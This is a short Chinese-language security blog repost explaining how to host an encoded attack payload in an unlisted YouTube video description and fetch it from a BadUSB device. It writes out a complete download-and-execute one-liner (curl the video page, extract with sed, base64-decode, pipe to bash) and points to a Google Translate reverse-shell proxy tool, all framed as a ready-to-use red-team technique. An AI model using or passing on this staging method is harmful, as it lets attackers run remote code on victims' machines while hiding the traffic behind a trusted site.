在Youtube上托管恶意Payload

释放双眼,带上耳机,听听看~!

之前在知识星球(在里面搜关键词可以直接下视频看)发过一个关于通过使用谷歌翻译作为反向shell的代理

演示视频:

地址:

https://github.com/mthbernardes/GTRS

现在这里介绍一种新的托管payload的方式,因为虽然用google翻译进行代理,流量是可以保证安全的,但是还是需要一个C2进行payload加载,因此作者提出了一种新的思路,通过youtube进行bash脚本托管。

首先,使用powershell,bash,python或您想要的任何语言创建有效负载,然后在base64中对其进行编码。

base64 -w0 payload

现在在youtube上上传一个视频,让它不公开,并在视频描述中插入你的payload编码,可以在payload的开头和结尾添加一个标签,就像这样,sCmD[YOUPAYLOAD]eCmD这就是全部,现在你只需要在你的橡皮鸭payload上执行这个命令

curl https://www.youtube.com/watch?v=VIDEOID | sed -n 's/.*sCmD\(.*\)eCmD.*/\1/p' | base64 -d | bash

可以使用twitter的bit.ly进行短网址生成

该作者实际上是基于badusb出做这一系列操作,很有红队风格。

星球在公众号入口,现在两顿饭钱,现在入驻次年续费五折

本文源自微信公众号:黑鸟

人已赞赏
安全工具

欧洲刑警组织捣毁全球第二大暗网交易平台“华尔街市场”

2019-10-16 10:35:44

安全工具

微软正在监听Skype和Cortana​的录音,美其名曰改善用户体验

2019-10-16 10:35:49

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索